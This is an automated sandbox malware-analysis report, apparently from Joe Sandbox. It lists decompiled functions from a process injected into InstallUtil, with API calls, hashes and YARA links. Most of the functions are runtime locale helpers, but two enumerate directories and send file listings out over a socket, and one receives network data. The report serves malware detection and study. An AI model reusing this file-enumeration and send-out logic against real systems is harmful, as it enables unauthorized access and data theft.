				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
				_t52 = _t42 + 2;
				do {
					_t29 =  *_t42;
					_t42 = _t42 + _t48;
				} while (_t29 != 0);
				_t8 =  &_a4; // 0x44e461
				_t53 =  *_t8;
				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
				_t53[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t48 = E0044DE08( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t48;
				_t32 = EnumSystemLocalesW(E0044DE34, 1);
				_t62 =  *_t53 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t53 = 0;
					return _t34;
				}
				return _t34;
			}

0x0044dd19
0x0044dd1f
0x0044dd20
0x0044dd23
0x0044dd26
0x0044dd26
0x0044dd29
0x0044dd2b
0x0044dd39
0x0044dd3f
0x0044dd42
0x0044dd45
0x0044dd45
0x0044dd48
0x0044dd4a
0x0044dd53
0x0044dd53
0x0044dd5e
0x0044dd61
0x0044dd67
0x0044dd72
0x0044dd72
0x0044dd7b
0x0044dd7e
0x0044dd86
0x0044dd8c
0x0044dd90
0x0044dd95
0x0044dd99
0x0044dd9e
0x0044dda0
0x00000000
0x0044dda0
0x0044dda6

APIs

Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3

EnumSystemLocalesW.KERNEL32(0044DE34,00000001,00000000,?,00440B2C,?,0044E461,00000000,?,?,?), ref: 0044DD7E

Strings

aD, xrefs: 0044DD53

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: aD
API String ID: 1084509184-45356255
Opcode ID: 3ecafb8d9185c3743efaea55cb0e12e4db6744239c8b4da06d348465cc1ba71e
Instruction ID: eb3055dd26bff70a051a26feb185d0fbee26ebf88123d7282749a628f911e3c3
Opcode Fuzzy Hash: 3ecafb8d9185c3743efaea55cb0e12e4db6744239c8b4da06d348465cc1ba71e
Instruction Fuzzy Hash: 5E112977A007055FEB189F39D89167ABB91FFC0358B14442DE9464BB40D775B942C744

Uniqueness

Uniqueness Score: -1.00%

Function 004162EF Relevance: 3.2, APIs: 2, Instructions: 245
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004162EF(char* __edx, void* __eflags, char _a8) {
				struct _WIN32_FIND_DATAW _v1028;
				char _v1036;
				char _v1064;
				char _v1088;
				void* _v1092;
				char _v1100;
				char _v1116;
				void* _v1120;
				char _v1128;
				char _v1136;
				char _v1152;
				char _v1156;
				char _v1160;
				void* _v1164;
				char _v1172;
				char _v1176;
				void* _v1188;
				char _v1196;
				void* _v1200;
				void* _v1204;
				char _v1208;
				char _v1220;
				char _v1224;
				char _v1228;
				char _v1232;
				char _v1236;
				char _v1240;
				char _v1252;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t63;
				int _t85;
				int _t91;
				void* _t102;
				void* _t109;
				char* _t113;
				void* _t115;
				void* _t116;
				void* _t130;
				void* _t133;
				void* _t228;
				void* _t229;
				void* _t234;
				signed int _t235;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t243;

				_t243 = __eflags;
				_t213 = __edx;
				_push(_t139);
				_t63 = E00401F6B( &_a8);
				E00404162( &_a8,  &_v1100, 4, 0xffffffff);
				_t238 = (_t235 & 0xfffffff8) - 0x4b4;
				E004020B6(_t139, _t238, __edx, _t243, 0x46e260);
				_t239 = _t238 - 0x18;
				E004020B6(_t139, _t239, __edx, _t243,  &_v1116);
				E0041851D( &_v1252, _t213);
				_t240 = _t239 + 0x30;
				_t228 =  *_t63 - 0x19;
				if(_t228 == 0) {
					E0040209F(_t139,  &_v1220);
					_t213 = 0x46e968;
					E004078F9( &_v1172, 0x46e968, _t234, L"\\*");
					_t229 = FindFirstFileW(E00401EC4( &_v1172),  &_v1028);
					__eflags = _t229 - 0xffffffff;
					if(__eflags == 0) {
						L14:
						E004020B6(_t139, _t240 - 0x18, _t213, __eflags,  &_v1220);
						_push(0x5d);
						E00404A78(0x46eb00, _t213, __eflags);
						E00401EC9();
						E00401F98();
						goto L15;
					}
					E0040413E(_t139,  &_v1196, 0x46e968, _t234,  &(_v1028.cFileName));
					_t213 = ".";
					_t85 = E004078C9(__eflags);
					_t139 = _t85;
					E00401EC9();
					__eflags = _t85;
					if(__eflags != 0) {
						E00401FA2( &_v1228, ".", _t229, E00402077(_t139,  &_v1196, ".", _t234, __eflags,  &_v1028, 0x250));
						E00401F98();
					}
					while(1) {
						__eflags = FindNextFileW(_t229,  &_v1028);
						if(__eflags == 0) {
							goto L14;
						}
						E0040413E(_t139,  &_v1196, _t213, _t234,  &(_v1028.cFileName));
						_t213 = L"..";
						_t91 = E004078C9(__eflags);
						_t139 = _t91;
						E00401EC9();
						__eflags = _t91;
						if(__eflags != 0) {
							L00403336(E00402077(_t139,  &_v1196, L"..", _t234, __eflags,  &_v1028, 0x250));
							E00401F98();
						}
					}
					goto L14;
				} else {
					_t245 = _t228 == 1;
					if(_t228 == 1) {
						_t102 = E00418385( &_v1152, E00401E25( &_v1232, _t213, _t234, _t245, 1));
						E00402F65( &_v1176, E004078F9( &_v1128, 0x46e968, _t234, "\\"), _t102);
						E00401EC9();
						E00401EC9();
						E0040209F(_t139,  &_v1224);
						E00401EC4( &_v1176);
						_t213 =  &_v1224;
						_t109 = E004189A5( &_v1224);
						_t246 = _t109;
						if(_t109 != 0) {
							_t113 = E00401F6B(E00401E25(0x46e600,  &_v1224, _t234, _t246, 0x1b));
							_t247 =  *_t113 - 1;
							if( *_t113 == 1) {
								_t130 = E0040243C();
								E00405AE8( &_v1028, E00401F6B(0x46e5e8), _t130);
								_t133 = E0040243C();
								E00401FA2( &_v1240, _t213, 0x46e5e8, E00405C09(_t139,  &_v1036, _t213,  &_v1156, E00401F6B( &_v1228), _t133));
								E00401F98();
							}
							_t115 = E00401E25( &_v1232, _t213, _t234, _t247, 2);
							_t116 = E00401E25( &_v1236, _t213, _t234, _t247, 0);
							_t213 = E00402ED0(_t139,  &_v1160, E00402ED0(_t139,  &_v1136, E00402ED0(_t139,  &_v1088, E00402ED0(_t139,  &_v1064, E00402EF1( &_v1208, E00401E25( &_v1240, _t213, _t234, _t247, 1), _t234, 0x46e260), _t234, _t247, _t116), _t234, _t247, 0x46e260), _t234, _t247, _t115), _t234, _t247, 0x46e260);
							E00402ED0(_t139, _t240 - 0x18, _t122, _t234, _t247,  &_v1220);
							_push(0x5e);
							E00404A78(0x46eb00, _t122, _t247);
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
							E00401F98();
						}
						E00401F98();
						E00401EC9();
					}
					L15:
					E00401E4D( &_v1232, _t213);
					E00401F98();
					return E00401F98();
				}
			}

0x004162ef
0x004162ef
0x004162fe
0x00416301
0x00416317
0x0041631c
0x00416327
0x0041632c
0x00416339
0x00416342
0x00416347
0x0041634a
0x0041634d
0x0041651a
0x00416524
0x0041652d
0x0041654b
0x0041654d
0x00416550
0x00416617
0x00416621
0x00416626
0x0041662d
0x00416636
0x0041663f
0x00000000
0x0041663f
0x00416562
0x00416567
0x0041656e
0x00416577
0x00416579
0x0041657e
0x00416580
0x0041659d
0x004165a6
0x004165a6
0x00416608
0x00416613
0x00416615
0x00000000
0x00000000
0x004165bf
0x004165c4
0x004165cb
0x004165d4
0x004165d6
0x004165db
0x004165dd
0x004165fa
0x00416603
0x00416603
0x004165dd
0x00000000
0x00416353
0x00416353
0x00416356
0x0041636d
0x00416390
0x0041639a
0x004163a3
0x004163ac
0x004163b5
0x004163ba
0x004163c0
0x004163c5
0x004163c7
0x004163db
0x004163e0
0x004163e3
0x004163ec
0x00416401
0x0041640a
0x00416430
0x00416439
0x00416439
0x0041644f
0x0041645c
0x004164b6
0x004164ba
0x004164c0
0x004164c7
0x004164d0
0x004164d9
0x004164e5
0x004164f1
0x004164fa
0x004164fa
0x00416503
0x0041650c
0x0041650c
0x00416644
0x00416648
0x00416654
0x00416667
0x00416667

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00416545
FindNextFileW.KERNEL32(00000000,?,?), ref: 00416611

Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID:
API String ID: 341183262-0
Opcode ID: e5c511b54431d6af09c301084ec25070c7bfddbcb7f6eaabd03b5b2420e2744b
Instruction ID: a26aadaeba453cd238509f59d481c7992e227e501a03fe21758d02ac29eb64a2
Opcode Fuzzy Hash: e5c511b54431d6af09c301084ec25070c7bfddbcb7f6eaabd03b5b2420e2744b
Instruction Fuzzy Hash: 558153315083455AC314FB22CC66EEF73A9AF91348F40493FF546671E2EF38A949C69A

Uniqueness

Uniqueness Score: -1.00%

Function 0040620E Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040620E(char _a4) {
				void* _v16;
				struct _WIN32_FIND_DATAW _v596;
				char _v620;
				void* _v632;
				char _v644;
				void* _v648;
				char _v652;
				void* _v656;
				char _v668;
				char _v676;
				void* _v700;
				void* __ebx;
				void* __esi;
				void* __ebp;
				int _t29;
				void* _t34;
				void* _t49;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t74 = FindFirstFileW(E00401EC4( &_a4),  &_v596);
				_t80 = _t74 - 0xffffffff;
				if(_t74 != 0xffffffff) {
					E0040209F(_t49,  &_v668);
					E0040413E(_t49,  &_v644, _t71, _t75,  &(_v596.cFileName));
					_t72 = ".";
					_t29 = E004078C9(__eflags);
					_t50 = _t29;
					E00401EC9();
					__eflags = _t29;
					if(__eflags != 0) {
						E00401FA2( &_v676, ".", _t74, E00402077(_t50,  &_v644, ".", 0x250, __eflags,  &_v596, 0x250));
						L5:
						E00401F98();
					}
					__eflags = FindNextFileW(_t74,  &_v596);
					if(__eflags != 0) {
						_t34 = E00402077(_t50,  &_v620, _t72, 0x250, __eflags,  &_v596, 0x250);
						_t72 =  &_v676;
						E00401FA2( &_v676,  &_v676, _t74, E004078D8(_t50,  &_v652,  &_v676, 0x250, __eflags, _t34));
						E00401F98();
						goto L5;
					}
					E004020B6(_t50, _t77 - 0x18, _t72, __eflags,  &_v668);
					_push(0x50);
					E00404A78(0x46e328, _t72, __eflags);
					E00401F98();
				} else {
					E00418445(_t49, _t77 - 0x18,  &_a4);
					_push(0x54);
					E00404A78(0x46e328,  &_a4, _t80);
				}
				return E00401EC9();
			}

0x0040622f
0x00406231
0x00406234
0x0040625c
0x0040626d
0x00406272
0x00406279
0x00406282
0x00406284
0x0040628e
0x00406290
0x004062a6
0x004062e6
0x004062e6
0x004062e6
0x004062f7
0x004062f9
0x004062bb
0x004062c1
0x004062d4
0x004062dd
0x00000000
0x004062e2
0x00406305
0x0040630a
0x00406311
0x0040631a
0x00406236
0x00406242
0x00406247
0x0040624e
0x0040624e
0x00406334

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,-00000001), ref: 00406229
FindNextFileW.KERNEL32(00000000,?,?,?,-00000001), ref: 004062F1

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID:
API String ID: 4113138495-0
Opcode ID: fcdacda9fe9f4e786d16d534c6280b269c7ba8401a346d0249c7ae28d711531f
Instruction ID: 9958a12bfbb4ba08b4aca9fca0fc78b401751e1e3a6f6c2f4e9dda6e764b097a
Opcode Fuzzy Hash: fcdacda9fe9f4e786d16d534c6280b269c7ba8401a346d0249c7ae28d711531f
Instruction Fuzzy Hash: BF2173315043415BC714FB61DC99DAFB3A8AF91358F40093FB586621E2EF3CAA09C65B

Uniqueness

Uniqueness Score: -1.00%

Function 0044E084 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0044E084(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebp;
				signed int _t16;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t35;
				signed int* _t50;
				int _t53;
				signed int _t54;

				_t16 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t16 ^ _t54;
				_t35 = E00444255(__ebx, __ecx, __edx);
				_t50 =  *(E00444255(_t35, __ecx, __edx) + 0x34c);
				_t53 = E0044E15C(_a4);
				asm("sbb ecx, ecx");
				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t22 != 0) {
					_t24 = E0044F785(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
					if(_t24 != 0) {
						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
							_t31 = E0044F785(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
							if(_t31 == 0) {
								_push(_t50);
								_push(_t31);
								goto L9;
							}
						}
					} else {
						if( *(_t35 + 0x60) != _t24) {
							L10:
							 *_t50 =  *_t50 | 0x00000004;
							_t50[1] = _t53;
							_t50[2] = _t53;
						} else {
							_push(_t50);
							_push(1);
							L9:
							_push(_t53);
							if(E0044E2B4(_t35) != 0) {
								goto L10;
							}
						}
					}
				} else {
					 *_t50 =  *_t50 & _t22;
				}
				return E004318FB(_v8 ^ _t54);
			}

0x0044e08f
0x0044e096
0x0044e0a4
0x0044e0ac
0x0044e0bb
0x0044e0c7
0x0044e0d8
0x0044e0e0
0x0044e0f1
0x0044e0fa
0x0044e10a
0x0044e11c
0x0044e125
0x0044e127
0x0044e128
0x00000000
0x0044e128
0x0044e125
0x0044e0fc
0x0044e0ff
0x0044e136
0x0044e136
0x0044e139
0x0044e13c
0x0044e101
0x0044e101
0x0044e102
0x0044e129
0x0044e129
0x0044e134
0x00000000
0x00000000
0x0044e134
0x0044e0ff
0x0044e0e2
0x0044e0e2
0x0044e0e4
0x0044e159

APIs

Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3

Part of subcall function 00444255: _free.LIBCMT ref: 004442B4
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442C1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044E0D8

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: a7991556a60d0f52b05dfba32f3594f02ecea51a4dfe7727653c54649b7cd0d2
Instruction ID: 7c3f0c6a3f856400e3624027ed18d4a48bc7be73c297c67ae2bfd224e57694f9
Opcode Fuzzy Hash: a7991556a60d0f52b05dfba32f3594f02ecea51a4dfe7727653c54649b7cd0d2
Instruction Fuzzy Hash: 262183729402069BFB249E2ADC42BBB73A8FF44314F1001BBF905D6241EB789D45C759

Uniqueness

Uniqueness Score: -1.00%

Function 0044E2B4 Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0044E2B4(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);
				_t8 = E00444255(__ebx, _t16, _t22);
				_t27 = _a4;
				_t24 = _t8;
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
					if(_t27 == _v8 || _a8 == 0) {
						L7:
						_t12 = 1;
					} else {
						_t29 =  *((intOrPtr*)(_t24 + 0x50));
						_t20 = _t29 + 2;
						do {
							_t13 =  *_t29;
							_t29 = _t29 + 2;
						} while (_t13 != 0);
						if(E0044DE08( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
							goto L1;
						} else {
							goto L7;
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				return _t12;
			}

0x0044e2b9
0x0044e2bc
0x0044e2c1
0x0044e2c4
0x0044e2e8
0x0044e2f1
0x0044e31b
0x0044e31d
0x0044e2f9
0x0044e2f9
0x0044e2fc
0x0044e2ff
0x0044e2ff
0x0044e302
0x0044e305
0x0044e319
0x00000000
0x00000000
0x00000000
0x00000000
0x0044e319
0x0044e2ea
0x0044e2ea
0x0044e2ea
0x0044e2ea
0x0044e323

APIs

Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044E052,00000000,00000000,?), ref: 0044E2E0

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: c3a4badbf8709a1aa90c87c041315b104450e781e03cffe67df0b7836d74f200
Instruction ID: 96046800f1bbf67de7a36a5e7d3cd6df397acbff32d2288606bd6d82971d54d4
Opcode Fuzzy Hash: c3a4badbf8709a1aa90c87c041315b104450e781e03cffe67df0b7836d74f200
Instruction Fuzzy Hash: 6AF0F932910126FBFB285A67C8057BB7768FB40755F1404AEFC19A3640EA79BD41C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 0044DDA7 Relevance: 1.5, APIs: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0044DDA7(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t11;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				intOrPtr* _t20;
				intOrPtr _t25;
				void* _t26;
				void* _t27;

				_t27 = E00444255(_t17, __ecx, __edx);
				_t25 = 2;
				_t20 =  *((intOrPtr*)(_t27 + 0x50));
				_t26 = _t20 + 2;
				do {
					_t11 =  *_t20;
					_t20 = _t20 + _t25;
				} while (_t11 != 0);
				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
				 *(_t27 + 0x60) = _t13;
				if(_t13 == 0) {
					_t25 = E0044DE08( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
				EnumSystemLocalesW(E0044E084, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x0044ddb4
0x0044ddba
0x0044ddbb
0x0044ddbe
0x0044ddc1
0x0044ddc1
0x0044ddc4
0x0044ddc6
0x0044ddd4
0x0044ddd7
0x0044dddc
0x0044dde7
0x0044dde7
0x0044ddf0
0x0044ddf3
0x0044ddf9
0x0044ddff
0x0044de01
0x00000000
0x0044de01
0x0044de07

APIs

Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3

EnumSystemLocalesW.KERNEL32(0044E084,00000001,?,?,00440B2C,?,0044E425,00440B2C,?,?,?,?,?,00440B2C,?,?), ref: 0044DDF3

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 8819b3b6a967917b020e32d9d569d1ed6ea8f6a66b8dd80f38f91ffa60e6afdf
Instruction ID: 72a72f069abfd75914a56d9b38c076994bd77232498321b5852f207a1f47c94e
Opcode Fuzzy Hash: 8819b3b6a967917b020e32d9d569d1ed6ea8f6a66b8dd80f38f91ffa60e6afdf
Instruction Fuzzy Hash: 71F022366007045FEB145F3A9881B6B7B94FF8036CF14442EFA058B640D6B5AC42C688

Uniqueness

Uniqueness Score: -1.00%

Function 00444444 Relevance: 1.5, APIs: 1, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E00444444(void* __eflags) {
				int _t15;
				void* _t28;

				E00431740(0x469360, 0xc);
				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
				E00441948( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *0x46d728 = E0043F249( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
				_t15 = EnumSystemLocalesW(E004443FE, 1);
				_push(0x20);
				asm("ror eax, cl");
				 *0x46d728 = 0 ^  *0x46c00c;
				 *(_t28 - 0x1c) = _t15;
				 *(_t28 - 4) = 0xfffffffe;
				E004444BC();
				return E00431786();
			}

0x0044444b
0x00444450
0x00444459
0x0044445f
0x00444470
0x0044447c
0x0044448c
0x00444493
0x0044449b
0x004444a0
0x004444a3
0x004444aa
0x004444b6

APIs

Part of subcall function 00441948: EnterCriticalSection.KERNEL32(-0046D510,?,0043F09B,00000000,004691B8,0000000C,0043F056,0000000A,?,?,00441BE6,0000000A,?,0044430A,00000001,00000364), ref: 00441957

EnumSystemLocalesW.KERNEL32(004443FE,00000001,00469360,0000000C), ref: 0044447C

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: efa6df1383695662a50c9639d08f6bc8c9312fa48d89572b8e540a406ff5fdad
Instruction ID: 2d3b2032a2fe1bb3eefe2d1947f6df9e0cb2519fbdf89481f4df6945a9c4bbd3
Opcode Fuzzy Hash: efa6df1383695662a50c9639d08f6bc8c9312fa48d89572b8e540a406ff5fdad
Instruction Fuzzy Hash: D5F0F471A50204EFD710EF75D846B5D77E0EB08725F10516AF410DB2A1D7B949848B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0044DCC1 Relevance: 1.5, APIs: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0044DCC1(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t20 = E00444255(_t14, __ecx, __edx);
				_t16 =  *((intOrPtr*)(_t20 + 0x54));
				_t22 = _t16 + 2;
				do {
					_t9 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t9 != 0);
				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x44dc18, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x0044dccd
0x0044dcd1
0x0044dcd4
0x0044dcd7
0x0044dcd7
0x0044dcda
0x0044dcdd
0x0044dcf5
0x0044dcf8
0x0044dcfe
0x0044dd04
0x0044dd06
0x00000000
0x0044dd06
0x0044dd0b

APIs

Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3

EnumSystemLocalesW.KERNEL32(0044DC18,00000001,?,?,?,0044E483,00440B2C,?,?,?,?,?,00440B2C,?,?,?), ref: 0044DCF8

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 3b890b326ee7e83ac880baec3d7a5bf8e0390f8fa7c287892454aa51542b554b
Instruction ID: 0890d784007e13cafcb2babffbe114836c7bd704c93bbb15fe5661a1cd062d96
Opcode Fuzzy Hash: 3b890b326ee7e83ac880baec3d7a5bf8e0390f8fa7c287892454aa51542b554b
Instruction Fuzzy Hash: 6CF0E53670020567DB04AF35E84576A7F94FFC2759F46406EEA0A8B291C6B99882C794

Uniqueness

Uniqueness Score: -1.00%

Function 0040D39C Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040D39C(void* __ecx) {
				char _v8;
				void* __ebp;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t15;

				_push(__ecx);
				_t13 = __ecx;
				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
				E00402053(_t8, _t13, _t11, _t15,  &_v8);
				return _t13;
			}

0x0040d39f
0x0040d3a6
0x0040d3b0
0x0040d3bc
0x0040d3c7

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00412A8C,0046E260,0046E63C,0046E260,00000000,0046E260,00000000,0046E260,3.5.1 Pro), ref: 0040D3B0

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2dcf0cd1f6bceb71ca7a6520eb17d8190ac4801879e7607fc993522ebe44b203
Instruction ID: 8a77a34170e387ec3e25abbcec71795f19ebc393574df2c8955e107f55d06eb4
Opcode Fuzzy Hash: 2dcf0cd1f6bceb71ca7a6520eb17d8190ac4801879e7607fc993522ebe44b203
Instruction Fuzzy Hash: CFD05B3074431C77D51096859C0AFAB779CD701B56F0001A6BA04D72C0D9E15E0087D5

Uniqueness

Uniqueness Score: -1.00%

Function 0042386F Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00423879

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 945e8bcceedc8670f2f0c35a89d4ed3830837b1f733c7902278b10ce8af6a4d1
Instruction ID: 177bad63f6a8a700af5d27124bba5d21cb8f162e0f35cba8ec6e16b001b6a0f6
Opcode Fuzzy Hash: 945e8bcceedc8670f2f0c35a89d4ed3830837b1f733c7902278b10ce8af6a4d1
Instruction Fuzzy Hash: 46B09279118302FFCA150BA0DC0887A7EA6EBC8785B00892CF146411B0C636C490AB26

Uniqueness

Uniqueness Score: -1.00%

